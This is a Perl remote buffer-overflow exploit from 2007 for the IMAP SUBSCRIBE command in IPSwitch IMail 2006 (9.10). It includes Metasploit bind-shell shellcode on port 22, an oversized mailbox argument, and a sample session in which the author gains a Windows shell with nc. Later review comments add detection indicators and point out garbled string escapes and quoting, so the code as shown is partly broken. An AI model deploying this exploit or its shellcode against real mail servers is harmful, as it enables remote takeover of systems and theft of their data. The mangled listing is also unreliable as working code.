
# Title : IPSwitch IMail Server 2006 9.10 SUBSCRIBE Remote Overflow Exploit
# Published : 2007-07-26
# Author : ZhenHan.Liu


#!/use/bin/perl

# Test on Imail 2006(9.10), imap4d32.exe(6.8.8.1), windows 2003 Chinese SP1
# Code by yunshu, our team: www.ph4nt0m.org  Mail list: http://list.ph4nt0m.org

#F:>perl imail_SUBSCRIBE.pl 192.168.1.2 test_user test_pass
#* OK IMAP4 Server (IMail 9.10)
#0 OK LOGIN completed
#* FLAGS (Answered Flagged Deleted Seen Draft)
#* 0 EXISTS
#* 0 RECENT
#* OK [UIDVALIDITY 1185270594] UIDs valid
#* OK [UIDNEXT 485270595] Predicted next UID
#2 OK [READ-WRITE] SELECT completed
#3 OK SUBSCRIBE completed
#Trying..
#Bingle!Maybe get it!
#You can try to telnet 22 port, do you have nc?


#D:Microsoft Visual Studio 8VC>nc -vv 192.168.1.2 22
#192.168.1.2: inverse host lookup failed: h_errno 11004: NO_DATA
#(UNKNOWN) [192.168.1.2] 22 (?) open
#Microsoft Windows [.. 5.2.3790]
#(C) .... 1985-2003 Microsoft Corp.

#C:WINDOWSsystem32>net user
#net user

#\ .....

#-------------------------------------------------------------------------------
#Administrator            ASPNET                   Guest
#IUSR_WIN2K3              IWAM_WIN2K3              SUPPORT_388945a0
#..................


#C:WINDOWSsystem32>


use strict;
use warnings;
use IO::Socket;

# Flat script, no subs.  Flow: connect to IMAP/143, LOGIN with the
# supplied account, SELECT INBOX, then send one SUBSCRIBE command whose
# mailbox-name argument is roughly 265 KB long, wait, and tell the user to
# look for a listener on TCP/22 (the payload comment below records
# LPORT=22).  Affected build per the header comments: IMail 2006 (9.10),
# imap4d32.exe 6.8.8.1; presumably fixed in later vendor releases --
# check the vendor's advisories for this 2007 issue.
#
# Defender's view: the wire-level indicator is a single IMAP SUBSCRIBE
# with an argument orders of magnitude longer than any mailbox name,
# preceded by a successful LOGIN from a valid account; the host-level
# indicator is a new, unexpected listener on TCP/22 on the mail server.
#
# NOTE(review): several string literals in this rendering look garbled
# (e.g. "Connect error.n", the bare quotes inside the SUBSCRIBE line
# further down), so the listing as shown does not run the way the
# transcript above describes.  It is left untouched here.

# Usage check: exactly three positional arguments, otherwise print the
# banner and leave.
if( @ARGV != 3 )
{
	my $banner = qq{
Imail subscribe exploit, Test on Imail 2006(9.10),windows 2003 Chinese SP1
You must have a account to login the imap server, good luck!
Code by yunshu, our team www.ph4nt0m.org, enjoin this exp~~
					 
imail_subscribe.pl  <host>   <username>   <password>
};

	print $banner."n";
	
	# Non-zero exit; most shells report -1 as 255.
	exit( -1 );
}

# Target host and IMAP credentials, straight from the command line.
# NOTE(review): a password given on the command line is visible to other
# local users through the process table and ends up in shell history.
my $host = $ARGV[0];
my $user = $ARGV[1];
my $pass = $ARGV[2];

# Payload string; the author's comment records the generator, a bind
# listener on TCP/22 and a size of 344 bytes.  Reproduced verbatim,
# including whatever this rendering did to the escapes.
# win32_bind -  EXITFUNC=thread LPORT=22 Size=344 Encoder=Pex http://metasploit.com
my $shellcode =
"x2bxc9x83xe9xb0xd9xeexd9x74x24xf4x5bx81x73x13x41".
"xd1xfdxbcx83xebxfcxe2xf4xbdxbbx16xf1xa9x28x02x43".
"xbexb1x76xd0x65xf5x76xf9x7dx5ax81xb9x39xd0x12x37".
"x0exc9x76xe3x61xd0x16xf5xcaxe5x76xbdxafxe0x3dx25".
"xedx55x3dxc8x46x10x37xb1x40x13x16x48x7ax85xd9x94".
"x34x34x76xe3x65xd0x16xdaxcaxddxb6x37x1excdxfcx57".
"x42xfdx76x35x2dxf5xe1xddx82xe0x26xd8xcax92xcdx37".
"x01xddx76xccx5dx7cx76xfcx49x8fx95x32x0fxdfx11xec".
"xbex07x9bxefx27xb9xcex8ex29xa6x8ex8ex1ex85x02x6c".
"x29x1ax10x40x7ax81x02x6ax1ex58x18xdaxc0x3cxf5xbe".
"x14xbbxffx43x91xb9x24xb5xb4x7cxaax43x97x82xaexef".
"x12x82xbexefx02x82x02x6cx27xb9xfdxaax27x82x74x5d".
"xd4xb9x59xa6x31x16xaax43x97xbbxedxedx14x2ex2dxd4".
"xe5x7cxd3x55x16x2ex2bxefx14x2ex2dxd4xa4x98x7bxf5".
"x16x2ex2bxecx15x85xa8x43x91x42x95x5bx38x17x84xeb".
"xbex07xa8x43x91xb7x97xd8x27xb9x9exd1xc8x34x97xec".
"x18xf8x31x35xa6xbbxb9x35xa3xe0x3dx4fxebx2fxbfx91".
"xbfx93xd1x2fxccxabxc5x17xeax7ax95xcexbfx62xebx43".
"x34x95x02x6ax1ax86xafxedx10x80x97xbdx10x80xa8xed".
"xbex01x95x11x98xd4x33xefxbex07x97x43xbexe6x02x6c".
"xcax86x01x3fx85xb5x02x6ax13x2ex2dxd4xaex1fx1dxdc".
"x12x2ex2bx43x91xd1xfdxbc";

# Plain-text IMAP on port 143; no TLS anywhere in this script, so every
# byte below (credentials included) is visible on the network.
# NOTE(review): IO::Socket::INET documents the option as `Proto`; the
# lowercase `proto` key is probably ignored, and tcp is the module default
# anyway -- confirm against the module version in use.
my $sock = IO::Socket::INET->new( PeerHost=>$host, PeerPort=>"143", proto=>"tcp" ) || die "Connect error.n";

# Server greeting.  The test is an unanchored /OK/ anywhere in the line.
my $res = <$sock>;
print $res;
if( $res !~ /OK/ )
{
	exit( -1 );
}

# Four-byte value placed right after the padding region; the commented
# line is an alternative the author kept around.
my $opcode = "x60x1Ax9Cx76";
#my $opcode = "x61x62x63x64";

# Intended length, in bytes, of the padding region that ends with $shellcode.
my $num = 264991;

# The SUBSCRIBE argument: "#IMAILPUB" prefix, filler up to $num bytes with
# $shellcode at its tail, then $opcode plus a short trailer, then 400 more
# filler bytes.  The shape is what matters for detection: one IMAP
# SUBSCRIBE whose argument is ~265 KB, far beyond any legitimate mailbox
# name, easy to flag in server logs or with a length check on the wire.
my $nop = "#IMAILPUB" . "x90" x ( $num - length($shellcode) ).$shellcode."x90x90xebx06".$opcode."x90x90x90x90"."xE9x44xfdxffxff"."x90" x 400;

# login -- authenticated access is required: the malformed command only
# goes out after a successful IMAP LOGIN, so server logs will show a valid
# login from this client immediately before the oversized SUBSCRIBE.
print $sock "0 LOGIN $user $passrn";
$res = <$sock>;
# <$sock> yields undef once the server has closed the connection.
if( ! defined($res) )
{
	exit(-1);
}

print $res;
# Unanchored /OK/ again; a "NO"/"BAD" reply ends the run here.
if( $res !~ /OK/ )
{
	exit(-1);
}

# SELECT INBOX, echoing the untagged responses until the tagged
# "2 OK" / "2 BAD" line arrives.
print $sock "2 SELECT INBOXrn";
while( <$sock> )
{
	print $_;
	if( $_ =~ /2 OK/ || $_ =~ /2 BAD/ )
	{
		last;
	}
}

# The oversized SUBSCRIBE itself.  NOTE(review): the quoting on this line
# is mangled in this rendering (bare double quotes inside the literal).
print $sock "3 SUBSCRIBE "$nop"rn";
$res = <$sock>;
if( ! defined($res) )
{
	exit(-1);
}
print $res;

print "Trying..n";

# No outcome check at all: after a fixed 15 s wait the "success" line is
# printed unconditionally -- hence the "Maybe" in the message.
sleep( 15 );
print "Bingle! Maybe get it!nYou can try to telnet 22 port, do you have nc?n";

# Tidy up the IMAP session: send LOGOUT, echo whatever the server still
# sends, and close the socket.
print $sock "4 LOGOUTrn";
print <$sock>;

$sock->close();

# www.Syue.com [2007-07-26]